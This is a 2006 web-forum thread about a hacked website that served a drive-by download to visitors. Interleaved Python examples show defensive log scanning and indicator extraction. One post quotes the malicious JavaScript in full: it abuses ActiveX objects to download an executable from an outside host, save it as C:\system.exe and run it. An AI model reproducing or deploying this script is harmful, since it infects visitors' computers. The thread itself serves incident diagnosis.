Server Help

Trash Talk - shanky.com/server

Maverick - Thu Oct 26, 2006 6:30 am
Post subject: shanky.com/server
What's going on?
The menus are gone, making the site impossible to navigate through.
K' - Thu Oct 26, 2006 11:11 am
Post subject:
Everything seems to be in order for me.
Mine GO BOOM - Thu Oct 26, 2006 11:49 am
Post subject:
It appears the host changed the default handler for server-side includes. If you view the source, you would have seen a bunch of include scripts. Just added AddHandler server-parsed .html to .htaccess and works fine again.

When viewing the source of the page, I noticed that at the top of the index, before <title>, it had a javascript include of a file named biica.js, which does not exist anywhere on the site. Looking at the apache logs, there are 103 different such requests for random 5 letter javascript files, all returning 404 errors. Over the past couple of months, some people have mentioned that the shanky.com site has been flagging their antiviruses.

I take weekly backups of the shanky.com server, and nothing under my control is affected, at least that which I can control. Sent some logs to the host, hope they check the full machine. This is one of the big reasons why I enjoy having the full mineplowers.com machine (these forums hosted on the machine) all to me, every bit of software.
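The log pattern described above (requests for short, random-looking .js names that all return 404) is easy to sweep for after the fact. The following is an added example written for this thread, not code from the site or its host: it parses Apache combined-format lines and reports 404'd five-letter .js requests per client. The log lines are constructed for the example; only the name biica.js comes from the thread, the other names and the 192.0.2.x addresses are made up.

```python
import re
from collections import Counter

# Apache "combined" log format. The sample lines below are constructed for
# this example, not taken from the real server logs.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# The indicator from the thread: a five-letter script name that does not exist on the site.
SUSPECT_JS = re.compile(r'^/(?:[^/]*/)*[a-z]{5}\.js$')

SAMPLE_LOG = """\
192.0.2.10 - - [26/Oct/2006:10:02:11 -0400] "GET /server/ HTTP/1.1" 200 5123
192.0.2.10 - - [26/Oct/2006:10:02:12 -0400] "GET /biica.js HTTP/1.1" 404 213
192.0.2.11 - - [26/Oct/2006:10:05:40 -0400] "GET /qwzrt.js HTTP/1.1" 404 213
192.0.2.12 - - [26/Oct/2006:10:07:03 -0400] "GET /menu.js HTTP/1.1" 200 1890
192.0.2.13 - - [26/Oct/2006:10:09:15 -0400] "GET /cgi-bin/ryan/server-header.cgi HTTP/1.1" 200 410
192.0.2.11 - - [26/Oct/2006:10:11:22 -0400] "GET /pkxla.js HTTP/1.1" 404 213
"""


def parse_line(line):
    """Split one combined-format line into its fields, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_phantom_js(log_text):
    """Return (hits, per_ip): every 404'd five-letter .js request as
    (timestamp, client ip, path), plus how many each client made."""
    hits = []
    per_ip = Counter()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec:
            continue
        path = rec["path"].split("?", 1)[0]  # ignore any query string
        if rec["status"] == "404" and SUSPECT_JS.match(path):
            hits.append((rec["ts"], rec["ip"], path))
            per_ip[rec["ip"]] += 1
    return hits, per_ip


if __name__ == "__main__":
    hits, per_ip = find_phantom_js(SAMPLE_LOG)
    for ts, ip, path in hits:
        print(f"{ts}  {ip:15}  {path}")
    print("clients:", dict(per_ip))
```

The timestamps matter more than the count: a browser only requests a script the served page referenced, so each hit marks a moment when a visitor received an injected page, which is the "got a timestamp?" question asked later in the thread.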
Maverick - Thu Oct 26, 2006 2:18 pm
Post subject:
http://www.shanky.com/server/ is still showing all white with me.
The source is showing all kinds of cgi includes:
Code:
<!--#exec cgi="/cgi-bin/ryan/server-header.cgi"-->


Attached is what I get in my browser (FF1).
Solo Ace - Thu Oct 26, 2006 3:45 pm
Post subject:
Funny how this is what I get:

Code:
<html>
<body>
<script language="javascript">

function CreateO(o, n) {
var r = null;
try { eval('r = o.CreateObject(n)') }catch(e){}
if (! r) {
try { eval('r = o.CreateObject(n, "")') }catch(e){}
}
if (! r) {
try { eval('r = o.CreateObject(n, "", "")') }catch(e){}
}
if (! r) {
try { eval('r = o.GetObject("", n)') }catch(e){}
}
if (! r) {
try { eval('r = o.GetObject(n, "")') }catch(e){}
}
if (! r) {
try { eval('r = o.GetObject(n)') }catch(e){}
}
return(r);     
}

function Go(a) {
var obj_msxml2 = CreateO(a,"msxml2.XMLHTTP");
obj_msxml2.open("GET","http://mp3.realize.hk/store/index.php?reg=",false);
obj_msxml2.send();
var obj_adodb = CreateO(a,"adodb.stream");
obj_adodb.type = 1;
obj_adodb.open();
obj_adodb.Write(obj_msxml2.responseBody);
var fn = "C:\\system.exe";
obj_adodb.SaveToFile(fn,2);
var s = CreateO(a, "Shell.Application");
s.ShellExecute(fn);
return TRUE;
}


var i = 0;
var t = new Array(
'{BD96C556-65A3-11D0-983A-00C04FC29E30}',
'{BD96C556-65A3-11D0-983A-00C04FC29E36}',
'{AB9BCEDD-EC7E-47E1-9322-D4A210617116}',
'{0006F033-0000-0000-C000-000000000046}',
'{0006F03A-0000-0000-C000-000000000046}',
'{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}',
'{6414512B-B978-451D-A0D8-FCFDF33E833C}',
'{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}',
'{06723E09-F4C2-43c8-8358-09FCD1DB0766}',
'{639F725F-1B2D-4831-A9FD-874847682010}',
'{BA018599-1DB3-44f9-83B4-461454C84BF8}',
'{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}',
'{E8CCCDDF-CA28-496b-B050-6C07C962476B}',null);

while (t[i]) {
var a = null;
if (t[i].substring(0,1) == '{') {
a = document.createElement("object");
a.setAttribute("classid", "clsid:" + t[i].substring(1, t[i].length - 1));
} else {
try { a = new ActiveXObject(t[i]); } catch(e){}
}

if (a) {
try {           
var b = CreateO(a, "Shell.Application");
if (b) {
if (Go(a)) break;
}
}catch(e){}
}
i++;
}

</script>
</body>
</html>

Maverick - Thu Oct 26, 2006 4:09 pm
Post subject:
I doubt there are virus scripts at shanky's site linking to mp3.realize.hk

What does that do anyway?

Hmm..
It starts some activeX objects, downloads a program, stores it to C:\system.exe and executes it?
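That reading of the script (enumerate ActiveX controls, fetch a file over XMLHTTP, write it with ADODB.Stream, run it via Shell.Application) is the classic download-and-execute chain, and a captured page can be triaged for it without running anything. The block below is an added example, not code from the thread or the site: it pulls the indicators a responder would want (script includes placed before <title>, CLSIDs, URLs, Windows paths written to disk) out of a page and reports whether all four stages of the chain are present. The sample page is constructed for the example and uses example.invalid instead of a real host; the two CLSIDs are from the script quoted earlier in the thread.

```python
import re

# Indicator patterns. The chain names are the API stages visible in the quoted script.
CLSID_RE = re.compile(r'\{[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}')
URL_RE = re.compile(r'https?://[^\s"\'<>]+')
WINPATH_RE = re.compile(r'"([A-Za-z]:\\\\[^"]+)"')          # "C:\\..." as written in JS source
SCRIPT_SRC_RE = re.compile(r'<script[^>]+src=["\']([^"\']+)["\']', re.I)
CHAIN = ("msxml2.XMLHTTP", "adodb.stream", "SaveToFile", "ShellExecute")

# Constructed sample page: a script include before <title> plus a condensed chain.
SAMPLE_HTML = """\
<html><head>
<script language="javascript" src="biica.js"></script>
<title>Example</title></head>
<body>
<script language="javascript">
var x = CreateO(a, "msxml2.XMLHTTP");
x.open("GET", "http://example.invalid/store/index.php?reg=", false);
var s = CreateO(a, "adodb.stream");
s.SaveToFile("C:\\\\system.exe", 2);
CreateO(a, "Shell.Application").ShellExecute("C:\\\\system.exe");
var t = new Array('{BD96C556-65A3-11D0-983A-00C04FC29E30}', '{0006F033-0000-0000-C000-000000000046}');
</script></body></html>
"""


def injected_script_srcs(html):
    """External scripts referenced before <title>: the thread's tell-tale placement."""
    m = re.search(r'<title>', html, re.I)
    head = html[:m.start()] if m else html
    return SCRIPT_SRC_RE.findall(head)


def triage(html):
    """Static indicator extraction over one captured page."""
    lowered = html.lower()
    stages = [name for name in CHAIN if name.lower() in lowered]
    return {
        "injected_scripts": injected_script_srcs(html),
        "clsids": sorted(set(CLSID_RE.findall(html))),
        "urls": sorted(set(URL_RE.findall(html))),
        "dropped_paths": sorted(set(WINPATH_RE.findall(html))),
        "chain_stages": stages,
        "download_and_execute": len(stages) == len(CHAIN),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_HTML).items():
        print(f"{key}: {value}")
```

The CLSID list is the part worth keeping: each one names a control the script tries to instantiate, so it tells you which client-side component the attacker expected to be installed and which patches or kill bits would have stopped it on the visiting machine.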
BDwinsAlt - Thu Oct 26, 2006 5:27 pm
Post subject:
I have 3 friends that say Norton detected a virus, but when I go to the site (I use Firefox) AntiVir doesn't detect any viruses. I run virus scans at night while I'm asleep and they don't detect any viruses, and I run spyware scans after only going to shanky and there is no spyware.

I think someone is manipulating MGB's site.

Btw: What did you use to make your flash site? I like it.
Doc Flabby - Thu Oct 26, 2006 7:39 pm
Post subject:
The virus will only work in IE.

Firefox doesn't have ActiveX.

The code downloads an exe disguised as an mp3 from mp3.realize.hk.

I saw Firefox make a connection to a weird site but I can't get it to repeat the behavior, but AntiVir did detect a malicious javascript ...

I have a theory the counter that is used has been hacked, and that is where the exploit script came from, not the MGB server.
Mine GO BOOM - Thu Oct 26, 2006 7:54 pm
Post subject:
It went back 'down' because my brother changed the main folder's .htaccess to parse all index.html files as php scripts. Renamed his specific file and removed the crappy htaccess, works fine, again.

Yanked the counter code, since it didn't really record anything for the last couple of years when they last got bought out. But the host got back to me:
Woolnet.net wrote:
Hi,

I can move your account(s) to another server. Would you be interested in that?
This isn't a problem that will be easy to solve. It seems to be a security issue. Someone found an exploit in apache to inject into its memory to serve the .js files most probably. The strange thing is we aren't even able to reproduce the problem which will make it even more difficult.

We are planning to migrate all accounts soon anyways to a new server/OS with better security, reliability(RAID 1), and performance(Dual Opterons) anyway.

Moving your account now will help solve this problem sooner for you.

Derek Ting
General Manager
WoolNet - Hosting that you can count on
Tel: 1-519-590-2221

Solo Ace - Fri Oct 27, 2006 6:39 am
Post subject:
How is this possible? Lame.

And Mav, if that page wasn't there, why did the server send it to my browser?
BDwinsAlt - Fri Oct 27, 2006 7:55 am
Post subject:
I have to agree with solo on this one.
Mine GO BOOM - Fri Oct 27, 2006 4:28 pm
Post subject:
Solo Ace wrote:
And Mav, if that page wasn't there, why did the server send it to my browser?

Is that what you really get? Got a timestamp when it happened? If so, I can scan the system's memory and see if anything in there has a copy of that if it isn't in a file.
Confess - Fri Oct 27, 2006 10:31 pm
Post subject:
I remember seeing somewhere on shanky.com that the website was sending out viruses and crap.
Solo Ace - Sat Oct 28, 2006 2:18 pm
Post subject:
Sorry, usually everything's being logged here, but uh, just not at the moment.

I posted right after it happened to me, and yes I'm sure that was what I got.
K' - Sat Oct 28, 2006 6:13 pm
Post subject:
Since I didn't at any time have a problem with the page, I say that it's either Maverick's PC full of viruses or that his browser reeks.

Next topic.


P.S.
Woolnet has some cool CS guys.
And VPS starting at $30 looks good and cheap, too.
Maverick - Sun Oct 29, 2006 1:13 pm
Post subject:
K, your conclusion is totally flawed, making me believe you didn't read anything of this topic at all.
Go do something useful for a change and mind your own business.
Mine GO BOOM - Thu Nov 02, 2006 1:19 pm
Post subject:
Shanky.com, etc have moved from server2a.woolnet.net to server3a.woolnet.net. If anyone gets anything stupid happen to them again, let me know.